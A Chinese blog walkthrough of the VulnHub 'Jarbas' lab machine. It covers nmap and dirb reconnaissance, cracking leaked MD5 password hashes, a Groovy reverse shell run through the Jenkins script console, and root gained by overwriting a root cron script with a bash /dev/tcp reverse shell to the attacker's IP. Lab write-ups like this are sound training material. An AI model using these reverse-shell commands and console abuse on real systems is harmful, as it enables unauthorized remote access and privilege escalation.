vulnhub-Jarbas-wp

最新推荐文章于 2024-03-15 19:52:05 发布
最新推荐文章于 2024-03-15 19:52:05 发布
阅读量295 收藏
点赞数
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/108408557
版权

靶机描述

http://blog.yutian233.xyz/index.php/

If you want to keep your hacking studies, please try out this machine!

Jarbas 1.0 – A tribute to a nostalgic Brazilian search engine in the end of 90’s.

Objective: Get root shell!

下载 https://www.vulnhub.com/entry/jarbas-1,232/

清单

  • 信息搜集

    • netdiscover
    • nmap
    • dirb

  • 利用

    • 敏感文件泄露
    • md5解密
    • Jenkins 命令执行

  • 提权

    • 权限开放的 sh

信息搜集

靶机IP

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-trRs3pT6-1599211689904)(http://do.yutian233.xyz/image-20200902190950118.png)]

端口扫描

nmap -A 192.168.0.105

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Jarbas - O Seu Mordomo Virtual!
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).

开放 22、80、306、8080端口

80端口

image-20200902191112549

目录扫描结果

image-20200902191143246

3306端口

image-20200902191351503

无法连接

8080端口

image-20200902191300849

为后台登陆页面

尝试了,弱口令、nikto没有结果后

在 80 端口目录扫描增加参数,得到了一个新的目录

image-20200902191631176

内容为

image-20200902191650974

解密结果

tiago:5978a63b4654c73c60fa24f836386d87 	italia99
trindade:f463f63616cb3f1e81ce46b39f882fd5      marianna
eder:9b38e2b1e8b12f426b0d208a7ab6cb98	vipsu

可以在https://pmd5.com/ 来解密1

访问 8080后台来登陆

image-20200902191934832

使用 eder vipsu 来登陆

登陆成功后在

系统管理—>下拉脚本命令行2

来执行命令

println “whoami”.execute().text

image-20200902192345131

测试可用

低权限用户

现在来反弹shell

image-20200902194409630

监听端口 2233

在网页中输入

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.108/2233;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

image-20200902194506914

得到shell

在 目录

image-20200902194550156

找到了 .bash_history 文件(这个文件存储用户历史命令)

/var/lib/jenkins 为jenkins的安装目录

在这个文件里找到了一个 .sh

image-20200902194708200

CleaningScript.sh 权限为 root

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xuWL0DLB-1599211649746)(http://do.yutian233.xyz/image-20200902194753885.png)]

获取root

使用它来得到 root 的shell

image-20200902194906785

在 kali 中监听一个新的端口 6666

echo 'bash -i >& /dev/tcp/192.168.0.108/6666 0>&1'  > /etc/script/CleaningScript.sh

稍等即可到 root

image-20200902195040992

并获取 flag 文件

  1. https://pmd5.com/ ↩︎

  2. https://blog.csdn.net/limb0/article/details/103185649 ↩︎

赛博雨天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:Jarbas1.0
汗的博客
04-26 766
这次的靶机是vulnhub靶机:Jarbas1.0,因为合天有在线靶机,就直接用合天的在线靶机了。 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/jarbas-1,232/ If you want to keep your hacking studies, please try out...
VulnHub系列之Jarbas渗透测试
Flynn的博客
04-26 1096
jarbas 虚拟机:https://www.vulnhub.com/entry/jarbas-1,232/ 如果你想继续你的黑客研究,请试试这台机器! Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。 目标:获取root shell!
红队笔记-2:JARBAS打靶流程(vulnhub
最新发布
qq_63442530的博客
03-15 947
1.主机发现和端口扫描:nmap扫描发现靶机是192.168.200.140,和存活端口22,80,3306,8080。2.80和8080端口:从web角度入手,80端口是web,8080端口是web的后台,对其web先进行目录扫描,发现普通扫扫描没有扫描发现,尝试添加参数扫描-X,扫描后发现access.html文档,通过破解access.html页面的密文获得账号密码,组合账号密码登录后台成功。
Vulnhub -- jarbas靶机渗透
Gh0st_1n_The_Shell的博客
05-31 613
信息收集 扫描开放的端口 进行目录爆破 尝试攻击 提权 提权--信息收集 目标:拿到服务器的Shell 信息收集 配置好后用nmap扫描 kali's ip:192.168.241.131 nmap -sP 192.168.241.131/24 一个个扫描 发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142 扫描开放的端口 nmap -sV 192.168.241.142 ...
vulnhub-midnight-wp
yutianovo的博客
08-05 421
博客地址 http://blog.yutian233.xyz/ 靶机描述 Difficulty: Intermediate Important!: Before auditing this machine make sure you add the host "sunset-midnight" to your /etc/hosts file, otherwise it may not work as expected. It is recommended to run this machine in V
JARBAS - VulnHub(漏洞靶场渗透测试)
Start C的博客
12-06 312
VulnHub的一个靶场
PyPI 官网下载 | jarbas_hive_mind-0.3.5.tar.gz
02-01
资源来自pypi官网。 资源全名:jarbas_hive_mind-0.3.5.tar.gz
论文研究 - 加强高中地理制图的使用
05-19
首先,根据Jarbas Passarinho School高中2年级学生研究的教科书内容,这项工作基于针对性文献综述,通过使用人造卫星(Google Earth)的图像开展实际活动来开展。 在进行此类活动时,已经注意到学生和老师在处理...
jarbasmedeiros
03-07
你好呀 :waving_hand: 我是Jarbas Medeiros 后端开发人员 :seedling: 我目前正在学习有关Java和Spring Boot的更多信息 :closed_mailbox_with_raised_flag: 如何联系我: 语言和框架 操作系统和工具 关于我
红队打靶:JARBAS详细打靶思路(vulnhub
Bossfrank的博客
06-03 1462
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
vulnhub BLOGGER: 1 WP
qq_37410729的博客
04-13 147
然后查看一下/etc/passwd 发现可能有james,ubuntu,vagrant这些用户,也没翻到与密码有关的信息,索性就用用户名做密码试试,竟然登录成功了vagrant。然后就可以在kali中用arp扫到靶机了,得到IP地址,然后进行端口扫描,又是开启了22和80,然后去web进行信息收集。只需要有个图片头就可以绕过力,上传shell,shell地址也会回显,然后蚁剑成功连接。扫到一些目录,点进去挨个翻一翻,最终翻到一个留言系统。大部分按钮都不好使,注册也不好用,扫一下目录。
vulnhub-dc3-渗透靶机-wp
yutianovo的博客
08-31 456
靶机描述 DESCRIPTION DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is o
【甄选靶场】Vulnhub百个项目渗透——项目三十二:DC-6(WP插件漏洞,跳板,二进制提权)
人间体佐菲的博客
10-05 719
【甄选靶场】Vulnhub百个项目渗透——项目三十二:DC-6(WP插件漏洞,跳板,二进制提权)
【甄选靶场】Vulnhub百个项目渗透——项目十五:Raven-1(wp利用,UDF提权)
人间体佐菲的博客
09-17 734
网络安全,渗透测试,信息安全
vulnhub:wpwn靶机
qq_43884092的博客
01-09 293
靶机:192.168.111.145端口扫描目录爆破使用wpscan发现插件存在漏洞。
Vulnhub靶机实战-POTATO-WP
黑白的博客
01-18 688
声明 好好学习,天天向上 搭建 virtualbox打开,网络和攻击机一样,要么都用桥接要么都用NAT 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.66 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22,2122 访问80 http://192.168.31.66 扫描目录 python3 dirsearch.py -u 192.168.31.66 挨个试一试,发现 /admin需要密码 /admin/logs
Vulnhub-Basilic
KAKA的博客
07-10 542
灰常有意思的一次训练,需要对 python 沙箱逃逸有一定程度的理解,让我们开始游戏吧~ [注:从源地址下载出得知需要拿到 4 个 flag] 利用 namp 扫描获取目标 IP 地址:nmap -sn 192.168.67.1/24 继续获取目标的相关开放端口等信息:namp -A -p- 192.168.67.18 可以看到下列信息: http服务对应的端口是 5000 ,而不是 80,其次还开放了 22 --> ssh 服务,我们登陆到 web 页面游玩下~ 点击 contact me,得到
【学渗透靶机 ——JARBAS
jieli0901227的博客
04-05 247
通过nmap 扫描结果发现有两个IP,192.168.241.140 为 KALI。这个页面中加密字符串,通过kali工具判断有可能是MD5,passwd 能够查看,而shadow 文件没有查看权限。尝试访问/etcpasswd 和/etc/shadow。使用burp 抓包后台登录界面进行尝试爆破。发现80端口有两个页面,而8080没有。(2)还发现构造项目中可以命令执行。写入反弹shell ,保存后。访问index为默认页面,但是反弹shell没有成功。成功拿到webshell。计划任务中脚本有写权限,
靶机实操—JARBAS—学习笔记
qq_46965422的博客
03-13 277
Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。 目标:获取 root shell!
jarbas--靶机实操详解
qq_61802750的博客
10-12 203
枚举类型通常用于为程序中的一组相关的常量取名字,以便于程序的可读性和维护性。我们看到,最下边有条记录,每五分钟以root的权限,执行这个shell脚本,执行结果就是把它扔掉。80端口是http,攻击面很大,可以优先考虑。我们现在就在jackson这个账户,有不正常的交互。我们去识别一下下面的字符,看看是什么加密方式,不出意外的话就是MD5。我们试一下,使用eder账号,密码使用vipsu。那我们再写入一个shell,打开监听,看看是否是root权限。index是我们当前的页面,我们先访问一下access。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值